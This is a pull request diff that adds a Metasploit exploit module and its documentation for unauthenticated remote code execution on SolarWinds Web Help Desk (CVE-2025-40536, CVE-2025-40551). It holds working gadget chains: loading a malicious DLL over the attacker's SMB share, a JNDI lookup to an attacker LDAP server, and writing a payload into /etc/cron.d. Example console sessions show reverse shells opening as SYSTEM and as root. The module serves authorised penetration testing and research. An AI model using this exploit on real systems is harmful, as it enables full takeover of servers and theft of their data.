### PR TITLE
Add exploit module for SolarWinds Web Help Desk (CVE-2025-40536 + CVE-2025-40551)

### DIFF
--- a/documentation/modules/exploit/multi/http/solarwinds_webhelpdesk_rce.md
+++ b/documentation/modules/exploit/multi/http/solarwinds_webhelpdesk_rce.md
@@ -30,8 +30,8 @@ Based on the above output, pick a suitable target:
 Configure the payload to execute:
 
 9. `set PAYLOAD windows/x64/meterpreter_reverse_tcp`
-10. `set RHOST eth0`
-11. `set RPORT 4444`
+10. `set LHOST eth0`
+11. `set LPORT 4444`
 12. `set SRVHOST eth0`
 
 Run the module:

--- a/documentation/modules/exploit/multi/http/solarwinds_webhelpdesk_rce.md
+++ b/documentation/modules/exploit/multi/http/solarwinds_webhelpdesk_rce.md
@@ -1,0 +1,217 @@
+## Vulnerable Application
+This module exploits an access control bypass vulnerability (CVE-2025-40536) and an unsafe deserialization
+vulnerability (CVE-2025-40551) to achieve unauthenticated RCE against a vulnerable SolarWinds Web Help Desk (WHD)
+server.
+
+## Testing
+The following [documentation](https://documentation.solarwinds.com/en/success_center/whd/content/helpdeskinstallstand-alonedeployment.htm)
+shows how to install a copy of Web Help Desk as a standalone installation on either Linux ow Windows.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/multi/http/solarwinds_webhelpdesk_rce`
+
+Configure the target:
+
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_HTTP_OR_HTTPS_PORT>` (If different from the default of 8443)
+5. `set SSL true` (Or set to false if targeting HTTP)
+
+Find out the target version and platform, so we know what target to set:
+
+6. `check`
+
+Based on the above output, pick a suitable target:
+
+7. `show targets`
+8. `set target 0`
+
+Configure the payload to execute:
+
+9. `set PAYLOAD windows/x64/meterpreter_reverse_tcp`
+10. `set RHOST eth0`
+11. `set RPORT 4444`
+12. `set SRVHOST eth0`
+
+Run the module:
+
+13. `exploit`
+
+## Scenarios
+
+### Example 1 - WHD 12.8.8.2528 on Windows
+
+_NOTE:_ If you are using the default Metasploit payloads you will have to disable Defender while testing, alternatively
+bring your own payloads.
+
+_NOTE:_ You need to run MSF as root so you can bind to a low port (445 for the SMB server). Also, open your firewall
+for ingress connections.
+
+```
+msf > use exploit/multi/http/solarwinds_webhelpdesk_rce 
+[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
+msf exploit(multi/http/solarwinds_webhelpdesk_rce) > set RHOST 192.168.86.146
+RHOST => 192.168.86.146
+msf exploit(multi/http/solarwinds_webhelpdesk_rce) > check
+[+] 192.168.86.146:8443 - The target is vulnerable. Detected Web Help Desk version 12.8.8.2528 (windows).
+msf exploit(multi/http/solarwinds_webhelpdesk_rce) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   WHD 12.8.* on Windows (Native code payload)
+    1   WHD 12.8.* on Linux (Command payload)
+    2   WHD 12.7.* on Windows (Command payload)
+    3   WHD 12.7.* on Linux (Command payload)
+
+
+msf exploit(multi/http/solarwinds_webhelpdesk_rce) > show options 
+
+Module options (exploit/multi/http/solarwinds_webhelpdesk_rce):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   LDIF_FILE                     no        Directory LDIF file path
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: http, sapni, socks4, socks5, socks5h
+   RHOSTS       192.168.86.146   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT        8443             yes       The target port (TCP)
+   SMB_SRVPORT  445              yes       The local SMB port to listen on.
+   SRVHOST      0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all address
+                                           es.
+   SRVPORT      389              yes       The local port to listen on.
+   SSL          true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI    /                yes       Base path
+   VHOST                         no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.86.122   yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   WHD 12.8.* on Windows (Native code payload)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(multi/http/solarwinds_webhelpdesk_rce) > set SRVHOST eth0
+SRVHOST => 192.168.86.122
+msf exploit(multi/http/solarwinds_webhelpdesk_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Detected Web Help Desk version 12.8.8.2528 (windows).
+[*] Step 1 - Initial session...
+[*] Step 2 - Login pref page...
+[*] Step 3 - Trigger SAML object...
+[*] Step 4 - Create JSON RPC bridge...
+[*] Step 5 - Unsafe deserialization...
+[*] Malicious SQLite extension UNC: \\192.168.86.122\vICI\QGwb.dll
+[*]   Executing gadget - Registering the org.sqlite.JDBC driver
+[*]   Executing gadget - Loading malicious extension over SMB
+[*] Sending stage (232006 bytes) to 192.168.86.146
+[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.146:61465) at 2026-02-04 20:25:27 +0000
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-V28QNSO2H05
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > pwd
+C:\Program Files\WebHelpDesk\bin\webapps\helpdesk
+meterpreter > 
+```
+
+### Example 2 - WHD 12.7.11.1182 on Linux
+
+```
+msf exploit(multi/http/solarwinds_webhelpdesk_rce) > set RHOST 192.168.86.43
+RHOST => 192.168.86.43
+msf exploit(multi/http/solarwinds_webhelpdesk_rce) > check
+[+] 192.168.86.43:8443 - The target is vulnerable. Detected Web Help Desk version 12.7.11.1182 (linux).
+msf exploit(multi/http/solarwinds_webhelpdesk_rce) > show targets 
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   WHD 12.8.* on Windows (Native code payload)
+    1   WHD 12.8.* on Linux (Command payload)
+    2   WHD 12.7.* on Windows (Command payload)
+    3   WHD 12.7.* on Linux (Command payload)
+
+
+msf exploit(multi/http/solarwinds_webhelpdesk_rce) > set target 3
+target => 3
+msf exploit(multi/http/solarwinds_webhelpdesk_rce) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf exploit(multi/http/solarwinds_webhelpdesk_rce) > show options 
+
+Module options (exploit/multi/http/solarwinds_webhelpdesk_rce):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   LDIF_FILE                     no        Directory LDIF file path
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: http, sapni, socks4, socks5, socks5h
+   RHOSTS       192.168.86.43    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT        8443             yes       The target port (TCP)
+   SMB_SRVPORT  445              yes       The local SMB port to listen on.
+   SRVHOST      192.168.86.122   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all address
+                                           es.
+   SRVPORT      389              yes       The local port to listen on.
+   SSL          true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI    /                yes       Base path
+   VHOST                         no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.86.122   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   3   WHD 12.7.* on Linux (Command payload)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(multi/http/solarwinds_webhelpdesk_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Detected Web Help Desk version 12.7.11.1182 (linux).
+[*] Step 1 - Initial session...
+[*] Step 2 - Login pref page...
+[*] Step 3 - Trigger SAML object...
+[*] Step 4 - Create JSON RPC bridge...
+[*] Step 5 - Unsafe deserialization...
+[*] Malicious JNDI URL: ldap://192.168.86.122:389/dc=jerxyf,dc=adg
+[*]   Executing gadget - Malicious JNDI lookup via ch.qos.logback.core.db.JNDIConnectionSource
+[*] Command shell session 2 opened (192.168.86.122:4444 -> 192.168.86.43:52134) at 2026-02-04 20:27:59 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```

--- a/documentation/modules/exploit/multi/http/solarwinds_webhelpdesk_rce.md
+++ b/documentation/modules/exploit/multi/http/solarwinds_webhelpdesk_rce.md
@@ -78,7 +78,6 @@ Module options (exploit/multi/http/solarwinds_webhelpdesk_rce):
    Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: http, sapni, socks4, socks5, socks5h
    RHOSTS       192.168.86.146   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
    RPORT        8443             yes       The target port (TCP)
-   SMB_SRVPORT  445              yes       The local SMB port to listen on.
    SRVHOST      0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all address
                                            es.
    SRVPORT      389              yes       The local port to listen on.
@@ -113,6 +112,7 @@ msf exploit(multi/http/solarwinds_webhelpdesk_rce) > exploit
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target is vulnerable. Detected Web Help Desk version 12.8.8.2528 (windows).
 [*] Step 1 - Initial session...
+[*] Serving a malicious extension over an SMB share on 192.168.86.122 (SMB on TCP port 445)
 [*] Step 2 - Login pref page...
 [*] Step 3 - Trigger SAML object...
 [*] Step 4 - Create JSON RPC bridge...
@@ -172,7 +172,6 @@ Module options (exploit/multi/http/solarwinds_webhelpdesk_rce):
    Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: http, sapni, socks4, socks5, socks5h
    RHOSTS       192.168.86.43    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
    RPORT        8443             yes       The target port (TCP)
-   SMB_SRVPORT  445              yes       The local SMB port to listen on.
    SRVHOST      192.168.86.122   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all address
                                            es.
    SRVPORT      389              yes       The local port to listen on.

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def start_service
     print_status('Step 0 - Starting SMB service...')
 
-    file_name << '.dll'
+    self.file_name += '.dll'
 
     self.file_contents = generate_payload_dll
 

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -91,8 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('TARGETURI', [true, 'Base path', '/']),
-      OptPort.new('SMB_SRVPORT', [true, 'The local SMB port to listen on.', 445])
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
     ])
   end
 
@@ -180,11 +179,12 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
     end
 
-    fail_with(Failure::BadConfig, 'SRVHOST must be a routable IP address') if datastore['SRVHOST'] == '0.0.0.0' || datastore['SRVHOST'] == '::'
+    # NOTE: It has to be TCP port 445 for SMB, so we don't expose this port number to the user as an option.
+    print_status("Serving a malicious extension over an SMB share on #{datastore['SRVHOST']} (SMB on TCP port 445)")
 
     smb_service = SimpleSMBShareWrapper.new
 
-    smb_service.datastore['SRVPORT'] = datastore['SMB_SRVPORT']
+    smb_service.datastore['SRVPORT'] = 445
     smb_service.datastore['SRVHOST'] = datastore['SRVHOST']
 
     smb_service.setup
@@ -194,7 +194,7 @@ class MetasploitModule < Msf::Exploit::Remote
     smb_service.file_name += '.dll'
 
     smb_service.start_service({
-      'ServerPort' => datastore['SMB_SRVPORT'],
+      'ServerPort' => 445,
       'ServerHost' => datastore['SRVHOST']
     })
 

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::EXE
+  include Msf::Exploit::Retry
 
   def initialize(info = {})
     super(
@@ -145,9 +146,16 @@ class MetasploitModule < Msf::Exploit::Remote
       Rex::ThreadSafe.sleep(2)
     end
 
+    # block untill we get a session, so we dont tear down the SMB/LDAP service prematurly.
+    retry_until_truthy(timeout: datastore['WfsDelay']) do
+      !handler_enabled? || session_created?
+    end
+
     unless session_ctx[:service].nil?
       session_ctx[:service].cleanup
     end
+
+    handler
   ensure
     cleanup_service
   end

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -9,7 +9,6 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::SMB::Server::Share
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
-  include Msf::Exploit::Retry
   include Msf::Exploit::EXE
 
   def initialize(info = {})

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -6,7 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::Remote::JndiInjection
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::EXE
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'SolarWinds Web Help Desk unauthenticated RCE',
         'Description' => %q{
           This module exploits an access control bypass vulnerability (CVE-2025-40536) and an unsafe deserialization
-          vulnerability (CVE-2025-40551) to achieve unauthenticated RCE against a vulnerable SolarWinds Web Help Desk
+          vulnerability (CVE-2025-40551) to achieve unauthenticated RCE against a vulnerable SolarWinds Web Help Desk (WHD)
           server.
         },
         'License' => MSF_LICENSE,
@@ -38,13 +38,41 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2026-01-28',
         'Privileged' => true, # Runs as "NT AUTHORITY\SYSTEM" by default on a Windows install.
-        'Platform' => ['win'],
-        'Arch' => [ARCH_X86, ARCH_X64],
+        'Platform' => ['win', 'unix', 'linux'],
+        'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
         'Targets' => [
           [
-            'Windows (Native code dropper)', {
+            'WHD 12.8.* on Windows (Native code payload)', {
+              'VersionStart' => '12.8',
               'Platform' => 'win',
               'Arch' => [ARCH_X86, ARCH_X64]
+            }
+          ],
+          [
+            'WHD 12.8.* on Linux (Command payload)', {
+              'VersionStart' => '12.8',
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Payload' => {
+                'BadChars' => '\''
+              },
+              'WfsDelay' => 90 # cron can take ~1 minute
+            }
+          ],
+          [
+            'WHD 12.7.* on Windows (Command payload)', {
+              'VersionStart' => '12.7',
+              'GadgetChain' => 'CommonsBeanutils1',
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+            }
+          ],
+          [
+            'WHD 12.7.* on Linux (Command payload)', {
+              'VersionStart' => '12.7',
+              'GadgetChain' => 'CommonsBeanutils1', # Tested against Web Help Desk version 12.7.11.1182 (linux)
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
             }
           ],
         ],
@@ -62,11 +90,9 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('TARGETURI', [true, 'Base path', '/'])
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptPort.new('SMB_SRVPORT', [true, 'The local SMB port to listen on.', 445])
     ])
-
-    # We generate these automatically, so deregister then here.
-    deregister_options('SHARE', 'FILE_NAME', 'FOLDER_NAME')
   end
 
   def check
@@ -77,37 +103,25 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Unknown(e.to_s)
   end
 
-  def setup
-    # NOTE: You have to run MSF as root so you can bind to this low port (and open it in your firewall).
-    if datastore['SRVPORT'] != 445
-      fail_with(Failure::BadConfig, 'SRVPORT must be 445 to serve a file over SMB')
-    end
-
-    super
-  end
-
-  def start_service
-    print_status('Step 0 - Starting SMB service...')
-
-    self.file_name += '.dll'
-
-    self.file_contents = generate_payload_dll
-
-    super
-  end
-
-  def primer
-    print_status("Malicious SQLite extension UNC: #{unc}")
-
+  def exploit
     print_status('Step 1 - Initial session...')
 
     session_ctx = step1_initial_session
 
+    # Verify the remote target matches the expectations for the Metasploit target's version and platform...
+
+    fail_with(Failure::BadConfig, "Remote target is running version #{session_ctx[:version]}, current Metasploit target gadget chain is for version #{target['VersionStart']}.*. Set a different target.") unless session_ctx[:version].start_with? target['VersionStart']
+
     case target['Platform']
     when 'win'
-      fail_with(Failure::BadConfig, "Remote target is running on #{session_ctx[:platform]} but Metasploit target platform is #{target['Platform']}") unless session_ctx[:platform] == :windows
-      # TODO: when 'linux', 'unix'
+      fail_with(Failure::BadConfig, "Remote target is running on #{session_ctx[:platform]} but Metasploit target platform is #{target['Platform']}. Set a different target.") unless session_ctx[:platform] == :windows
+    when ['unix', 'linux']
+      fail_with(Failure::BadConfig, "Remote target is running on #{session_ctx[:platform]} but Metasploit target platform is #{target['Platform']}. Set a different target.") unless session_ctx[:platform] == :linux
+    else
+      fail_with(Failure::BadConfig, "Unexpected target platform #{target['Platform']}. Set a different target.")
     end
+
+    session_ctx[:service] = get_target_service(session_ctx)
 
     print_status('Step 2 - Login pref page...')
 
@@ -121,39 +135,145 @@ class MetasploitModule < Msf::Exploit::Remote
 
     jsonrpc_client = step4_create_jsonrpc_bridge(session_ctx)
 
-    print_status('Step 5 - Registering the org.sqlite.JDBC driver...')
+    print_status('Step 5 - Unsafe deserialization...')
 
-    # We first need to registering the org.sqlite.JDBC driver so we can use it, as it may have not already
-    # been registered. By instantiating org.sqlite.JDBC, the classes static initializer will register the driver.
-    json_data = {
-      'javaClass' => 'org.sqlite.JDBC'
-    }
+    get_target_gadgets(session_ctx).each do |gadget|
+      print_status("  Executing gadget - #{gadget[:title]}")
 
-    step5_trigger_unsafe_deserialization(session_ctx, jsonrpc_client, json_data)
+      step5_trigger_unsafe_deserialization(session_ctx, jsonrpc_client, gadget[:json_data], return_early: true)
 
-    # let the driver load
-    Rex::ThreadSafe.sleep(3)
+      Rex::ThreadSafe.sleep(2)
+    end
 
-    print_status('Step 6 - Loading malicious extension over SMB...')
-
-    # With the org.sqlite.JDBC driver available, we leverage com.zaxxer.hikari.HikariDataSource to create a sqlite
-    # connection. We use a sqlite in-memory database to avoid touching disk, and we leverage the enable_load_extension
-    # pragma to allow us to load arbitrary native code extensions. Hikari allows us to execute arbitrary SQL statement
-    # when a new database connection is opened. We use this to load a malicious extension that contains a Metasploit
-    # native code payload.
-    # Tested against Web Help Desk version 12.8.8.2528 running on Windows Server 2022 (NOTE: If you are using
-    # the default Metasploit payloads you will have to disable Defender while testing, alternatively bring your
-    # own payloads).
-    json_data = {
-      'javaClass' => 'com.zaxxer.hikari.HikariDataSource',
-      'driverClassName' => 'org.sqlite.SQLiteDataSource',
-      'jdbcUrl' => 'jdbc:sqlite::memory:?enable_load_extension=true',
-      'connectionInitSql' => "SELECT load_extension('#{unc}');"
-    }
-
-    step5_trigger_unsafe_deserialization(session_ctx, jsonrpc_client, json_data, return_early: true)
-
+    unless session_ctx[:service].nil?
+      session_ctx[:service].cleanup
+    end
+  ensure
     cleanup_service
+  end
+
+  class SimpleSMBShareWrapper < ::Msf::Exploit
+    include ::Msf::Exploit::Remote::SMB::Server::Share
+  end
+
+  def get_target_service(session_ctx)
+    if target['VersionStart'] == '12.7'
+      start_service
+      return nil
+    end
+
+    # For 12.8.* targets on Windows, our gadget will force a native code library (a DLL) to be loaded from a UNC path
+    # over SMB. We need to spin up an SMB server with a share to satisfy this. As we already
+    # include Msf::Exploit::Remote::JndiInjection we cannot also include Msf::Exploit::Remote::SMB::Server::Share. To
+    # overcome this, we wrap the SMB server mixin in a new Exploit class, and instantiate it separately.
+    return nil unless target['VersionStart'] == '12.8' && session_ctx[:platform] == :windows
+
+    fail_with(Failure::BadConfig, 'SMB_SRVPORT must be 445 to serve a file over SMB') unless datastore['SMB_SRVPORT'].to_i == 445
+
+    fail_with(Failure::BadConfig, 'SRVHOST must be a routable IP address') if datastore['SRVHOST'] == '0.0.0.0' || datastore['SRVHOST'] == '::'
+
+    smb_service = SimpleSMBShareWrapper.new
+
+    smb_service.datastore['SSRVPORT'] = datastore['SMB_SRVPORT']
+    smb_service.datastore['SRVHOST'] = datastore['SRVHOST']
+
+    smb_service.setup
+
+    smb_service.file_contents = generate_payload_dll
+
+    smb_service.file_name += '.dll'
+
+    smb_service.start_service({
+      'ServerPort' => datastore['SMB_SRVPORT'],
+      'ServerHost' => datastore['SRVHOST']
+    })
+
+    smb_service
+  end
+
+  def get_target_gadgets(session_ctx)
+    gadgets = []
+
+    if target['VersionStart'] == '12.7'
+      # Tested against Web Help Desk version 12.7.11.1182 running on Linux.
+
+      print_status("Malicious JNDI URL: #{jndi_string}")
+
+      gadgets.push({
+        title: 'Malicious JNDI lookup via ch.qos.logback.core.db.JNDIConnectionSource',
+        json_data: {
+          'javaClass' => 'ch.qos.logback.core.db.JNDIConnectionSource', # logback-core.jar
+          'jndiLocation' => jndi_string
+        }
+      })
+    elsif target['VersionStart'] == '12.8'
+      # We first need to register the org.sqlite.JDBC driver so we can use it, as it may have not already
+      # been registered. By instantiating org.sqlite.JDBC, the classes static initializer will register the driver.
+      gadgets.push({
+        title: 'Registering the org.sqlite.JDBC driver',
+        json_data: {
+          'javaClass' => 'org.sqlite.JDBC'
+        }
+      })
+
+      if session_ctx[:platform] == :windows
+        print_status("Malicious SQLite extension UNC: #{session_ctx[:service].unc}")
+
+        # With the org.sqlite.JDBC driver available, we leverage com.zaxxer.hikari.HikariDataSource to create a sqlite
+        # connection. We use a sqlite in-memory database to avoid touching disk, and we leverage the enable_load_extension
+        # pragma to allow us to load arbitrary native code extensions. Hikari allows us to execute arbitrary SQL statement
+        # when a new database connection is opened. We use this to load a malicious extension that contains a Metasploit
+        # native code payload.
+        #
+        # Tested against Web Help Desk version 12.8.8.2528 running on Windows Server 2022 (NOTE: If you are using
+        # the default Metasploit payloads you will have to disable Defender while testing, alternatively bring your
+        # own payloads).
+        gadgets.push({
+          title: 'Loading malicious extension over SMB',
+          json_data: {
+            'javaClass' => 'com.zaxxer.hikari.HikariDataSource',
+            'driverClassName' => 'org.sqlite.SQLiteDataSource',
+            'jdbcUrl' => 'jdbc:sqlite::memory:?enable_load_extension=true',
+            'connectionInitSql' => "SELECT load_extension('#{session_ctx[:service].unc}');"
+          }
+        })
+      elsif session_ctx[:platform] == :linux
+        # Leveraging a dirty file write viw SQLite to a cronjob has been shown to work against some cron daemons:
+        # https://kiddo-pwn.github.io/blog/2025-11-30/writing-sync-popping-cron
+        # However when testing against an Ubuntu system, I get the syslog error:
+        # cron[427]: Error: bad minute; while reading /etc/cron.d/hax_5
+        #
+        random_name = Rex::Text.rand_text_alpha(8)
+
+        gadgets.push({
+          title: "Creating file in /etc/cron.d/#{random_name}",
+          json_data: {
+            'javaClass' => 'com.zaxxer.hikari.HikariDataSource',
+            'driverClassName' => 'org.sqlite.SQLiteDataSource',
+            'jdbcUrl' => "jdbc:sqlite:/etc/cron.d/#{random_name}",
+            'connectionInitSql' => 'CREATE TABLE a (b TEXT UNIQUE);'
+          }
+        })
+
+        gadgets.push({
+          title: "Dirty file write to /etc/cron.d/#{random_name}",
+          json_data: {
+            'javaClass' => 'com.zaxxer.hikari.HikariDataSource',
+            'driverClassName' => 'org.sqlite.SQLiteDataSource',
+            'jdbcUrl' => "jdbc:sqlite:/etc/cron.d/#{random_name}",
+            'connectionInitSql' => "INSERT OR IGNORE INTO a (b) VALUES ('\n* * * * * root #{payload.encoded}\n');"
+          }
+        })
+      end
+    else
+      fail_with(Failure::BadConfig, "Unexpected target version #{target['VersionStart']}. Set a different target.")
+    end
+  end
+
+  # By default, Metasploit will use BeanFactory, but we want CommonsBeanutils1. The gadget chain used here is left
+  # as a target option so we can add new targets (i.e. specific versions of WHD) with ease.
+  def build_ldap_search_response_payload
+    build_ldap_search_response_payload_inline(target['GadgetChain'])
   end
 
   def step1_initial_session

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = GreatRanking
 
   include Msf::Exploit::Remote::JndiInjection
   include Msf::Exploit::Remote::HttpClient
@@ -83,6 +83,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSL' => true
         },
         'Notes' => {
+          # For the 12.8.* target on Windows, the service may crash and restart so we use a stability of
+          # CRASH_SERVICE_RESTARTS, but for all the other targets the stability is CRASH_SAFE.
           'Stability' => [CRASH_SERVICE_RESTARTS],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [IOC_IN_LOGS] # C:\Program Files\WebHelpDesk\log\whd.log

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSL' => true
         },
         'Notes' => {
-          'Stability' => [CRASH_SAFE],
+          'Stability' => [CRASH_SERVICE_RESTARTS],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [IOC_IN_LOGS] # C:\Program Files\WebHelpDesk\log\whd.log
         }

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -1,0 +1,348 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Retry
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SolarWinds Web Help Desk unauthenticated RCE',
+        'Description' => %q{
+          This module exploits an access control bypass vulnerability (CVE-2025-40536) and an unsafe deserialization
+          vulnerability (CVE-2025-40551) to achieve unauthenticvate RCE againt a vulnerable SolarWinds Web Help Desk
+          server.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jimi Sebree', # Original finder @ horizon3.ai
+          'sfewer-r7' # MSF module (Based on the Nuclei template by horizon3.ai)
+        ],
+        'References' => [
+          # Access control bypass vulnerability
+          ['CVE', '2025-40536'],
+          # Unsafe deserialization for RCE
+          ['CVE', '2025-40551'],
+          # Vendor advisory
+          ['URL', 'https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm'],
+          # Technical analysis from horizon3.ai
+          ['URL', 'https://horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/']
+        ],
+        'DisclosureDate' => '2026-01-28',
+        'Privileged' => true, # Runs as "NT AUTHORITY\SYSTEM" by default on a Windows install.
+        'Platform' => ['win'],
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Windows (Native code dropper)', {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64]
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS] # C:\Program Files\WebHelpDesk\log\whd.log
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+
+    deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')
+  end
+
+  def check
+    session_ctx = step1_initial_session
+
+    CheckCode::Vulnerable("Detected Web Help Desk version #{session_ctx[:version]} (#{session_ctx[:platform]}).")
+  rescue Msf::Exploit::Failed => e
+    CheckCode::Unknown(e.to_s)
+  end
+
+  def setup
+    # NOTE: You have to run MSF as root so you can bind to this low port (and open it in your firewall).
+    if datastore['SRVPORT'] != 445
+      fail_with(Failure::BadConfig, 'SRVPORT must be 445 to serve a file over SMB')
+    end
+
+    super
+  end
+
+  def start_service
+    print_status('Step 0 - Starting SMB service...')
+
+    file_name << '.dll'
+
+    self.file_contents = generate_payload_dll
+
+    super
+  end
+
+  def primer
+    print_status("Malicious SQLite extension UNC: #{unc}")
+
+    print_status('Step 1 - Initial session...')
+
+    session_ctx = step1_initial_session
+
+    case target['Platform']
+    when 'win'
+      fail_with(Failure::BadConfig, "Remote target is runnign on #{session_ctx[:platform]} but Metasploit target platform is #{target['Platform']}") unless session_ctx[:platform] == :windows
+      # TODO: when 'linux', 'unix'
+    end
+
